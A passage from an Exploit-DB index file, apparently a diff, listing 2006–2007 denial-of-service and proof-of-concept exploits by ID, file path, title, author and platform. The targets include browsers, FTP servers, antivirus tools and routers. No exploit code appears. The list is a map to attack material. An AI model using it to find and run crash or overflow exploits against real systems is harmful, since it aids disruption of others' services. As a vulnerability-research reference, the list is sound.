Driver Remote Buffer Overflow",2006-06-30,Preddy,dos,windows, +1972,exploits/multiple/dos/1972.txt,"Opera Web Browser 9.00 - 'iframe' Remote Denial of Service",2006-07-01,y3dips,dos,multiple, +1976,exploits/windows/dos/1976.cpp,"Quake 3 Engine Client - 'CG_ServerCommand()' Remote Overflow",2006-07-02,RunningBon,dos,windows, +1977,exploits/win_x86/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,dos,win_x86, +1980,exploits/windows/dos/1980.pl,"ImgSvr 0.6.5 - POST Denial of Service",2006-07-04,n00b,dos,windows, +1984,exploits/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - SFX Path Stack Overflow",2006-07-05,posidron,dos,windows, +1989,exploits/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",dos,windows, +1990,exploits/windows/dos/1990.html,"Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow",2006-07-07,"H D Moore",dos,windows, +2000,exploits/hardware/dos/2000.pl,"SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)",2006-07-10,"Michael Thumann",dos,hardware, +2001,exploits/windows/dos/2001.c,"Microsoft Word 2000/2003 - Unchecked Boundary Condition",2006-07-10,"naveed afzal",dos,windows, +2037,exploits/windows/dos/2037.c,"Dumb 0.9.3 - 'it_read_envelope' Remote Heap Overflow (PoC)",2006-07-19,"Luigi Auriemma",dos,windows, +2039,exploits/windows/dos/2039.pl,"Microsoft Internet Explorer 6 - 'Content-Type' Stack Overflow Crash",2006-07-20,Firestorm,dos,windows, +2051,exploits/linux/dos/2051.py,"Sendmail 8.13.5 - Remote Signal Handling (PoC)",2006-07-21,redsand,dos,linux, +2057,exploits/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)",2006-07-21,cocoruder,dos,windows, +2059,exploits/hardware/dos/2059.cpp,"D-Link Devices - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,dos,hardware, +2073,exploits/multiple/dos/2073.c,"libmikmod 3.2.2 - GT2 Loader Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",dos,multiple, +2124,exploits/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)",2006-08-07,ratboy,dos,windows, +2147,exploits/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)",2006-08-08,Elo,dos,windows, +2156,exploits/hardware/dos/2156.c,"PocketPC Mms Composer - 'WAPPush' Denial of Service",2006-08-09,"Collin Mulliner",dos,hardware, +2160,exploits/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows (PoC)",2006-08-10,"Luigi Auriemma",dos,windows, +2176,exploits/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Crash (Denial of Service)",2006-08-13,Qode,dos,hardware, +2179,exploits/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,dos,multiple, +2180,exploits/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,dos,multiple, +2194,exploits/windows/dos/2194.pl,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)",2006-08-16,Preddy,dos,windows, +2195,exploits/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete",2006-08-16,nop,dos,windows, +2204,exploits/windows/dos/2204.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)",2006-08-17,Preddy,dos,windows, +2208,exploits/windows/dos/2208.html,"Macromedia Flash 9 - IE Plugin Remote Crash (Denial of Service)",2006-08-18,Mr.Niega,dos,windows, +2210,exploits/windows/dos/2210.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)",2006-08-18,vegas78,dos,windows, +2238,exploits/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,nop,dos,windows, +2244,exploits/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - FTP Request Remote Denial of Service",2006-08-22,"Tomas Kempinsky",dos,multiple, +2245,exploits/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - 'USER' Remote Buffer Overflow (PoC)",2006-08-22,"Leon Juranic",dos,windows, +2246,exploits/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,dos,hardware, +2302,exploits/windows/dos/2302.pl,"J. River Media Center 11.0.309 - Remote Denial of Service (PoC)",2006-09-05,n00b,dos,windows, +2303,exploits/multiple/dos/2303.html,"dsock 1.3 - 'buf' Remote Buffer Overflow (PoC)",2006-09-05,DaveK,dos,multiple, +2334,exploits/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - GET Denial of Service",2006-09-08,n00b,dos,windows, +2400,exploits/windows/dos/2400.html,"Microsoft Internet Explorer - VML Remote Denial of Service (PoC)",2006-09-19,Shirkdog,dos,windows, +2444,exploits/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service",2006-09-27,"Tavis Ormandy",dos,multiple, +2515,exploits/multiple/dos/2515.txt,"Kmail 1.9.1 - IMG SRC Remote Denial of Service",2006-10-11,nnp,dos,multiple, +2523,exploits/windows/dos/2523.pl,"Microsoft Office 2003 - '.PPT' Local Buffer Overflow (PoC)",2006-10-12,Nanika,dos,windows, +2524,exploits/bsd/dos/2524.c,"FreeBSD 5.4/6.0 - 'ptrace PT_LWPINFO' Local Denial of Service",2006-10-12,kokanin,dos,bsd, +2541,exploits/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service",2006-10-13,kokanin,dos,bsd, +2542,exploits/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - 'scheduler' Local Denial of Service",2006-10-13,kokanin,dos,bsd, +2571,exploits/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,dos,windows, +2586,exploits/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length Denial of Service (PoC)",2006-10-17,"Damian Put",dos,multiple, +2587,exploits/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",dos,multiple, +2597,exploits/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",dos,multiple, +2625,exploits/windows/dos/2625.c,"QK SMTP 3.01 - 'RCPT TO' Remote Denial of Service",2006-10-23,"Greg Linares",dos,windows, +2629,exploits/windows/dos/2629.html,"Microsoft Internet Explorer - ADODB Execute Denial of Service (PoC)",2006-10-24,"YAG KOHHA",dos,windows, +2639,exploits/bsd/dos/2639.c,"FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",dos,bsd, +2650,exploits/windows/dos/2650.c,"RevilloC MailServer 1.x - 'RCPT TO' Remote Denial of Service",2006-10-25,"Greg Linares",dos,windows, +2672,exploits/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,dos,windows, +2682,exploits/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,dos,windows, +2695,exploits/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - 'createRange' Remote Denial of Service",2006-10-31,"Gotfault Security",dos,multiple, +2700,exploits/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)",2006-11-01,"H D Moore",dos,hardware, +2708,exploits/windows/dos/2708.c,"NullSoft Winamp 5.3 - Ultravox-Max-Msg Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,dos,windows, +2715,exploits/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,dos,windows, +2716,exploits/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Remote Denial of Service",2006-11-04,CorryL,dos,windows, +2730,exploits/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)",2006-11-06,"Evgeny Legerov",dos,linux, +2734,exploits/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 - 'APPE' Remote Buffer Overflow (PoC)",2006-11-07,"Joxean Koret",dos,windows, +2735,exploits/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service",2006-11-07,"Joxean Koret",dos,windows, +2783,exploits/windows/dos/2783.html,"WinZip 10.0.7245 - FileView ActiveX Control Stack Overflow (PoC)",2006-11-14,prdelka,dos,windows, +2787,exploits/windows/dos/2787.c,"UniversalFTP 1.0.50 - 'MKD' Remote Denial of Service",2006-11-15,"Greg Linares",dos,windows, +2854,exploits/windows/dos/2854.py,"AT-TFTP 1.9 - 'Filename' Remote Buffer Overflow (PoC)",2006-11-27,"Liu Qixu",dos,windows, +2855,exploits/windows/dos/2855.py,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)",2006-11-27,"Liu Qixu",dos,windows, +2857,exploits/multiple/dos/2857.php,"PHP 4.4.4/5.1.6 - 'htmlentities()' Local Buffer Overflow (PoC)",2006-11-27,"Nick Kezhaya",dos,multiple, +2860,exploits/windows/dos/2860.c,"Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)",2006-11-28,"Greg Linares",dos,windows, +2861,exploits/windows/dos/2861.c,"Songbird Media Player 0.2 - Format String Denial of Service (PoC)",2006-11-28,"Greg Linares",dos,windows, +2874,exploits/bsd/dos/2874.pl,"NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC)",2006-11-30,kingcope,dos,bsd, +2879,exploits/windows/dos/2879.py,"Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service",2006-12-01,h07,dos,windows, +2892,exploits/linux/dos/2892.py,"F-Prot AntiVirus 4.6.6 - 'ACE' Denial of Service",2006-12-04,"Evgeny Legerov",dos,linux, +2893,exploits/linux/dos/2893.py,"F-Prot AntiVirus 4.6.6 - CHM Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",dos,linux, +2900,exploits/windows/dos/2900.py,"Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041)",2006-12-09,"Winny Thomas",dos,windows, +2901,exploits/windows/dos/2901.php,"FileZilla FTP Server 0.9.20b/0.9.21 - 'STOR' Denial of Service",2006-12-09,rgod,dos,windows, +2910,exploits/multiple/dos/2910.txt,"Sophos AntiVirus - '.CHM' File Heap Overflow (PoC)",2006-12-10,"Damian Put",dos,multiple, +2911,exploits/multiple/dos/2911.txt,"Sophos AntiVirus - '.CHM' Chunk Name Length Memory Corruption (PoC)",2006-12-10,"Damian Put",dos,multiple, +2912,exploits/multiple/dos/2912.txt,"Sophos / Trend Micro AntiVirus - '.RAR' File Denial of Service (PoC)",2006-12-10,"Damian Put",dos,multiple, +2914,exploits/windows/dos/2914.php,"FileZilla FTP Server 0.9.21 - 'LIST/NLST' Denial of Service",2006-12-11,shinnai,dos,windows, +2915,exploits/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 - ARP Flood Remote Denial of Service",2006-12-11,poplix,dos,hardware, +2916,exploits/windows/dos/2916.php,"Golden FTP server 1.92 - 'USER/PASS' Heap Overflow (PoC)",2006-12-11,rgod,dos,windows, +2922,exploits/windows/dos/2922.txt,"Microsoft Word Document - Malformed Pointer (PoC)",2006-12-12,DiscoJonny,dos,windows, +2926,exploits/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - 'LIST/NLST' Denial of Service",2006-12-13,shinnai,dos,windows, +2928,exploits/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",dos,linux, +2929,exploits/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - DLL-load Hijacking Code Execution (PoC)",2006-12-14,"Aviv Raff",dos,windows, +2934,exploits/windows/dos/2934.php,"Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service",2006-12-15,rgod,dos,windows, +2935,exploits/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,dos,windows, +2942,exploits/windows/dos/2942.py,"Star FTP Server 1.10 - 'RETR' Remote Denial of Service",2006-12-17,Necro,dos,windows, +2946,exploits/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,dos,windows, +2947,exploits/multiple/dos/2947.pl,"wget 1.10.2 - Unchecked Boundary Condition Denial of Service",2006-12-18,"Federico L. Bossi Bonin",dos,multiple, +2949,exploits/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",dos,multiple, +2952,exploits/windows/dos/2952.py,"WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service",2006-12-19,shinnai,dos,windows, +2954,exploits/linux/dos/2954.html,"KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception",2006-12-19,"Federico L. Bossi Bonin",dos,linux, +2961,exploits/hardware/dos/2961.py,"Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",dos,hardware, +2966,exploits/windows/dos/2966.html,"RealPlayer 10.5 - ActiveX Control Denial of Service",2006-12-20,shinnai,dos,windows, +2967,exploits/windows/dos/2967.cs,"Microsoft Windows - 'MessageBox' Memory Corruption Local Denial of Service",2006-12-20,anonymous,dos,windows, +2972,exploits/windows/dos/2972.c,"BolinTech DreamFTP Server 1.0.2 - 'PORT' Remote Denial of Service",2006-12-21,InTeL,dos,windows, +2978,exploits/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 - 'USER' Format String Denial of Service",2006-12-22,shinnai,dos,windows, +2985,exploits/windows/dos/2985.pl,"acFTP FTP Server 1.5 - 'REST/PBSZ' Remote Denial of Service",2006-12-23,gbr,dos,windows, +3013,exploits/windows/dos/3013.py,"Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service",2006-12-25,h07,dos,windows, +3023,exploits/linux/dos/3023.c,"KsIRC 1.3.12 - 'PRIVMSG' Remote Buffer Overflow (PoC)",2006-12-26,"Federico L. Bossi Bonin",dos,linux, +3030,exploits/windows/dos/3030.html,"RealPlayer 10.5 'ierpplug.dll' Internet Explorer 7 - Denial of Service",2006-12-28,shinnai,dos,windows, +3034,exploits/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Crash (Denial of Service)",2006-12-28,shinnai,dos,windows, +3038,exploits/windows/dos/3038.php,"Durian Web Application Server 3.02 - Denial of Service",2006-12-29,rgod,dos,windows, +3041,exploits/windows/dos/3041.html,"Macromedia Flash 8 (Flash8b.ocx) Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,dos,windows, +3042,exploits/windows/dos/3042.html,"Macromedia Shockwave 10 'SwDir.dll' Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,dos,windows, +3052,exploits/windows/dos/3052.c,"Microsoft Windows - 'Csrss.exe/winsrv.dll' NtRaiseHardError Double-Free",2006-12-31,"Ruben Santamarta",dos,windows, +3056,exploits/windows/dos/3056.pl,"Formbankserver 1.9 - 'Name' Remote Denial of Service",2006-12-31,Bl0od3r,dos,windows, +3069,exploits/osx/dos/3069.pl,"VideoLAN VLC Media Player 0.8.6 (PPC) - 'udp://' Format String (PoC)",2007-01-02,MoAB,dos,osx, +3078,exploits/windows/dos/3078.pl,"Acunetix WVS 4.0 20060717 - HTTP Sniffer Component Remote Denial of Service",2007-01-04,nitr0us,dos,windows, +3080,exploits/osx/dos/3080.rb,"iLife iPhoto Photocast - XML Title Remote Format String (PoC)",2007-01-04,MoAB,dos,osx, +3098,exploits/osx/dos/3098.html,"OmniWeb 5.5.1 - JavaScript alert() Remote Format String (PoC)",2007-01-07,MoAB,dos,osx, +3101,exploits/multiple/dos/3101.py,"Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption",2007-01-08,posidron,dos,multiple, +3110,exploits/osx/dos/3110.rb,"Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,dos,osx, +3111,exploits/windows/dos/3111.pl,"Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,dos,windows, +3112,exploits/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference",2007-01-10,"Ethan Hunt",dos,windows, +3119,exploits/windows/dos/3119.py,"VideoLAN VLC Media Player 0.8.6a - Denial of Service (1)",2007-01-12,shinnai,dos,windows, +3126,exploits/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,dos,windows, +3127,exploits/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)",2007-01-14,Marsu,dos,windows, +3128,exploits/windows/dos/3128.c,"BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,dos,windows, +3130,exploits/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk 'ATPsndrsp()' Heap Buffer Overflow (PoC)",2007-01-14,MoAB,dos,osx, +3138,exploits/windows/dos/3138.pl,"Twilight WebServer 1.3.3.0 - 'GET' Remote Denial of Service",2003-07-07,anonymous,dos,windows, +3139,exploits/osx/dos/3139.rb,"Colloquy 2.1.3545 - 'INVITE' Format String Denial of Service",2007-01-17,MoAB,dos,osx, +3142,exploits/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service",2007-01-17,shinnai,dos,windows, +3151,exploits/osx/dos/3151.rb,"Apple Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)",2007-01-18,MoAB,dos,osx, +3155,exploits/windows/dos/3155.html,"BrowseDialog Class 'ccrpbds6.dll' Internet Explorer 7 - Denial of Service",2007-01-18,shinnai,dos,windows, +3157,exploits/windows/dos/3157.html,"DivX Player 6.4.1 - DivXBrowserPlugin 'npdivx32.dll' IE Denial of Service",2007-01-19,shinnai,dos,windows, +3160,exploits/osx/dos/3160.html,"Transmit.app 3.5.5 - 'ftps://' URL Handler Heap Buffer Overflow (PoC)",2007-01-20,MoAB,dos,osx, +3166,exploits/osx/dos/3166.html,"Apple iChat 3.1.6 441 - 'aim://' URL Handler Format String (PoC)",2007-01-21,MoAB,dos,osx, +3167,exploits/osx/dos/3167.c,"Apple Mac OSX 10.4.x Kernel - 'shared_region_map_file_np()' Memory Corruption",2007-01-21,"Adriano Lima",dos,osx, +3182,exploits/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,dos,windows, +3190,exploits/windows/dos/3190.py,"Microsoft Windows Explorer - '.AVI' File Denial of Service",2007-01-24,shinnai,dos,windows, +3193,exploits/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)",2007-01-25,LifeAsaGeek,dos,windows, +3200,exploits/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,dos,osx, +3204,exploits/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",dos,windows, +3223,exploits/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",dos,cgi, +3224,exploits/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",dos,windows, +3229,exploits/windows/dos/3229.py,"Dev-C++ 4.9.9.2 - '.CPP' File Parsing Local Stack Overflow (PoC)",2007-01-30,shinnai,dos,windows, +3230,exploits/osx/dos/3230.rb,"Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Vulnerabilities",2007-01-30,MoAB,dos,osx, +3248,exploits/windows/dos/3248.rb,"CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service",2007-02-01,Shirkdog,dos,windows, +3254,exploits/windows/dos/3254.py,"Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow (PoC)",2007-02-02,shinnai,dos,windows, +3257,exploits/osx/dos/3257.php,"Chicken of the VNC 2.0 - 'NULL-pointer' Remote Denial of Service",2007-02-02,poplix,dos,osx, +3272,exploits/windows/dos/3272.html,"Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference",2007-02-05,AmesianX,dos,windows, +3276,exploits/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow Denial of Service",2007-02-06,Marsu,dos,windows, +3277,exploits/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 - Remote Heap Overflow Denial of Service",2007-02-06,Marsu,dos,windows, +3289,exploits/linux/dos/3289.c,"Axigen 2.0.0b1 - Remote Denial of Service (1)",2007-02-08,mu-b,dos,linux, +3290,exploits/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service (2)",2007-02-08,mu-b,dos,linux, +3304,exploits/windows/dos/3304.py,"MiniWebsvr 0.0.6 - Remote Resource Consumption Denial of Service",2007-02-13,shinnai,dos,windows, +3306,exploits/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,dos,windows, +3307,exploits/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,dos,windows, +3308,exploits/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,dos,windows, +3331,exploits/windows/dos/3331.c,"VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,dos,windows, +3341,exploits/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service Vulnerabilities",2007-02-20,Marsu,dos,windows, +3343,exploits/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - 'CWD' Remote Stack Overflow (PoC)",2007-02-20,Marsu,dos,windows, +3347,exploits/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service)",2007-02-20,Marsu,dos,windows, +3350,exploits/windows/dos/3350.html,"BrowseDialog Class - 'ccrpbds6.dll' Multiple Denial of Service Vulnerabilities",2007-02-21,shinnai,dos,windows, +3362,exploits/multiple/dos/3362.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service",2007-02-23,"Trirat Puttaraksa",dos,multiple, +3385,exploits/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - 'ABOR' Format String Denial of Service",2007-02-28,"Umesh Wanve",dos,windows, +3392,exploits/windows/dos/3392.html,"DivX Web Player 1.3.0 - 'npdivx32.dll' Remote Denial of Service",2007-03-01,shinnai,dos,windows, +3394,exploits/multiple/dos/3394.php,"PHP 4 - Userland ZVAL Reference Counter Overflow (PoC)",2007-03-01,"Stefan Esser",dos,multiple, +3396,exploits/linux/dos/3396.php,"PHP 4.4.4 - 'Unserialize()' ZVAL Reference Counter Overflow (PoC)",2007-03-02,"Stefan Esser",dos,linux, +3399,exploits/windows/dos/3399.txt,"Netrek 2.12.0 - 'pmessage2()' Remote Limited Format String",2007-03-02,"Luigi Auriemma",dos,windows, +3404,exploits/multiple/dos/3404.php,"PHP 5 - 'wddx_deserialize()' String Append Crash",2007-03-04,"Stefan Esser",dos,multiple, +3407,exploits/multiple/dos/3407.c,"Asterisk 1.2.15/1.4.0 - Unauthenticated Remote Denial of Service",2007-03-04,fbffff,dos,multiple, +3415,exploits/linux/dos/3415.html,"Konqueror 3.5.5 - JavaScript Read of FTP Iframe Denial of Service",2007-03-05,mark,dos,linux, +3418,exploits/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b - 'check' Buffer Overflow (PoC)",2007-03-06,mu-b,dos,windows, +3419,exploits/windows/dos/3419.txt,"Microsoft Windows - '.doc' Malformed Pointers Denial of Service",2007-03-06,Marsu,dos,windows, +3421,exploits/windows/dos/3421.html,"Macromedia 10.1.4.20 - 'SwDir.dll' Internet Explorer Stack Overflow Denial of Service",2007-03-07,shinnai,dos,windows, +3430,exploits/windows/dos/3430.html,"Adobe Reader Plugin 'AcroPDF.dll' 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,dos,windows, +3432,exploits/windows/dos/3432.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - 'UDP' Denial of Service",2007-03-08,"Umesh Wanve",dos,windows, +3433,exploits/windows/dos/3433.html,"Rediff Toolbar - ActiveX Control Remote Denial of Service",2007-03-08,"Umesh Wanve",dos,windows, +3434,exploits/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 - 'fragementation' Remote Denial of Service",2007-03-08,Antimatt3r,dos,multiple, +3441,exploits/linux/dos/3441.c,"Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)",2007-03-09,"Daniel Roethlisberger",dos,linux, +3444,exploits/windows/dos/3444.pl,"Microsoft Internet Explorer - FTP Server Response Denial of Service (MS07-016)",2007-03-09,"Mathew Rowley",dos,windows, +3453,exploits/windows/dos/3453.py,"Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,dos,windows, +3461,exploits/windows/dos/3461.pl,"TFTP Server 1.3 - Remote Buffer Overflow Denial of Service",2007-03-12,"Umesh Wanve",dos,windows, +3464,exploits/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow",2007-03-12,Marsu,dos,windows, +3514,exploits/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash",2007-03-18,DATA_SNIPER,dos,windows, +3526,exploits/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - 'SIP INVITE' Remote Denial of Service",2007-03-20,MADYNES,dos,hardware, +3527,exploits/win_x86/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,dos,win_x86, +3535,exploits/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone - Digest domain Denial of Service",2007-03-21,MADYNES,dos,hardware, +3547,exploits/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service",2007-03-22,DiGitalX,dos,windows, +3566,exploits/multiple/dos/3566.pl,"Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,dos,multiple, +3586,exploits/linux/dos/3586.php,"PHP 4.4.5/4.4.6 - 'session_decode()' Double-Free (PoC)",2007-03-27,"Stefan Esser",dos,linux, +3602,exploits/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service",2007-03-29,"Winny Thomas",dos,windows, +3606,exploits/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 - Hang / Crash (Denial of Service)",2007-03-29,shinnai,dos,multiple, +3674,exploits/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - Long Directory Name Denial of Service",2007-04-05,WiLdBoY,dos,windows, +3684,exploits/windows/dos/3684.c,"Microsoft Windows Explorer - '.ANI' File Denial of Service",2007-04-08,Marsu,dos,windows, +3690,exploits/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,dos,windows, +3693,exploits/windows/dos/3693.txt,"Microsoft Windows - '.hlp' Local HEAP Overflow (PoC)",2007-04-09,muts,dos,windows, +3709,exploits/multiple/dos/3709.html,"Gran Paradiso 3.0a3 - Non-Existent applet Denial of Service",2007-04-11,shinnai,dos,multiple, +3715,exploits/windows/dos/3715.py,"Sami HTTP Server 2.0.1 - POST Denial of Service",2007-04-12,shinnai,dos,windows, +3726,exploits/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service",2007-04-13,evilrabbi,dos,multiple, +3768,exploits/windows/dos/3768.pl,"Winamp 5.3 - '.wmv' Remote Denial of Service",2007-04-19,WiLdBoY,dos,windows, +3769,exploits/linux/dos/3769.c,"eXtremail 2.1.1 - DNS Parsing Bugs Remote (PoC)",2007-04-20,mu-b,dos,linux, +3770,exploits/windows/dos/3770.pl,"Foxit Reader 2.0 - 'PDF' Remote Denial of Service",2007-04-20,n00b,dos,windows, +3782,exploits/windows/dos/3782.pl,"Winamp 5.33 - '.avi' Remote Denial of Service",2007-04-23,DeltahackingTEAM,dos,windows, +3784,exploits/multiple/dos/3784.c,"Opera 9.2 - '.torrent' Remote Denial of Service",2007-04-23,n00b,dos,multiple, +3788,exploits/windows/dos/3788.html,"Second Sight Software - ActiveGS.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",dos,windows, +3789,exploits/windows/dos/3789.html,"Second Sight Software - ActiveMod.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",dos,windows, +3790,exploits/windows/dos/3790.html,"NetSprint Toolbar - ActiveX 'toolbar.dll' Denial of Service (PoC)",2007-04-24,"Umesh Wanve",dos,windows, +3791,exploits/hardware/dos/3791.pl,"Linksys SPA941 - '\377' Character Remote Denial of Service",2007-04-24,MADYNES,dos,hardware, +3792,exploits/hardware/dos/3792.pl,"Linksys SPA941 - Remote 